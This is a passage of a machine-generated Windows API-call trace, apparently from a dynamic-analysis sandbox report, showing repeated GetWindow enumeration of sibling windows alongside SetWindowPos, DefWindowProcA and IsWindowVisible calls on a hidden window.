0x10134 [0057.577] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.577] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.577] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.577] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.577] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.577] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.577] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.577] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.578] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.578] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.578] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.578] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.578] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.578] GetWindow (hWnd=0x20016, uCmd=0x2) returned 
0x200ae [0057.578] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.578] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.578] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.578] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.578] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.578] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.578] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.578] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.578] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.578] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.578] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.578] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.578] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.578] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.578] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.578] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.578] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.578] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.578] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.578] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.579] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.579] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.579] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.579] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.579] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.579] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.579] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.579] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.579] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.579] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.579] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.579] GetWindow (hWnd=0x100ee, 
uCmd=0x2) returned 0x100ec [0057.579] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.579] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.579] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.579] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.579] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.579] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.579] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.579] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.579] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.579] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.579] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.579] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.580] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.580] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.580] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.580] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.580] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.580] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.580] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.580] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.580] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.580] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.580] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.580] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.580] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.580] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.580] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.580] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.580] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.580] GetWindow (hWnd=0x70104, uCmd=0x2) returned 
0x301fc [0057.580] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.580] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.580] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.580] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.580] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.580] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.580] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.580] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.580] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.580] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.580] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.580] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.580] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.580] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.581] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.581] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.581] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.581] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.581] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.581] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.581] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.581] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.581] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.581] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.581] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.581] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.581] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.581] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.581] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.581] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.581] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.581] GetWindow (hWnd=0x10168, 
uCmd=0x2) returned 0x1016a [0057.581] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.581] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.581] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.581] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.581] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.581] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.581] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.581] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.581] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.581] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.581] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.581] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.581] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.581] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.581] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.582] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.582] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.582] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.582] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.582] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.582] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.582] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.582] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.582] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.582] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.582] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.582] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.582] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.582] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.582] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.582] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.582] 
GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.582] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.582] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.582] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.582] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.582] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.582] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.582] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.582] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.582] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.582] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.582] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.582] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.582] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.582] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.582] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.583] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.583] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.583] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.583] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.583] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.583] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.583] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.583] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.583] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.583] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.583] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.583] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.583] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.583] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.583] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.583] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 
0x20026 [0057.583] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.583] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.583] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.583] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.583] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.583] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.583] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.583] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.583] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.583] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.583] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.583] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.584] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.584] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.584] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.584] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.584] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.584] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.584] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.584] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.584] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.584] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.584] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.584] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.584] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.584] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.584] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.584] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.584] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.584] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 
[0057.584] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.584] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.584] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.584] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.584] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.584] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.584] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.584] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.584] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.584] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.584] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.584] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.584] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.584] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.585] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.585] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.585] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.585] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.585] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.585] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.585] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.585] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.585] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.585] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.585] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.585] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.585] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.585] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.585] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.586] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.586] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.586] GetWindow (hWnd=0x10170, uCmd=0x2) returned 
0x10172 [0057.586] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.586] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.586] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.586] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.586] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.586] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.586] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.586] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.586] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.586] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.586] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.586] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.586] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.586] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.586] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.586] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.586] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.586] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.586] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.586] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.586] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.586] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.586] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.587] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.587] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.587] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.587] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.587] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.587] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.587] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.587] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.587] GetWindow (hWnd=0x10120, 
uCmd=0x2) returned 0x20116 [0057.587] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.587] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.587] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.587] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.587] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.587] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.587] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.587] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.587] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.587] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.587] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.587] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.587] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.587] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.587] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.588] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.588] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.588] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.588] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.588] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.588] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.588] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.588] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.588] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.588] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.588] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.588] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.588] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.588] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.588] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.588] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.588] 
GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.588] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.588] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.588] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.588] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.588] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.588] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.589] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.589] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.589] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.589] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.589] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.589] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.589] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.589] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.589] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.589] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.589] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.589] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.589] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.589] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.589] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.589] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.589] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.589] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.589] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.589] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.589] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.589] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.589] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.589] GetWindow 
(hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.589] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.589] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.589] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.589] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.590] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.590] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.590] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.590] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.590] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.590] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.590] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.590] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.590] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.590] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.590] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.590] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.590] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.590] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.590] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.590] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.590] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.590] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.590] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.590] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.590] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.590] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.590] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.590] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.590] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.590] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.590] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.590] 
GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.590] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.590] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.590] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.591] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.591] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.591] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.591] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.591] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.591] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.591] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.591] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.591] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.591] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.591] 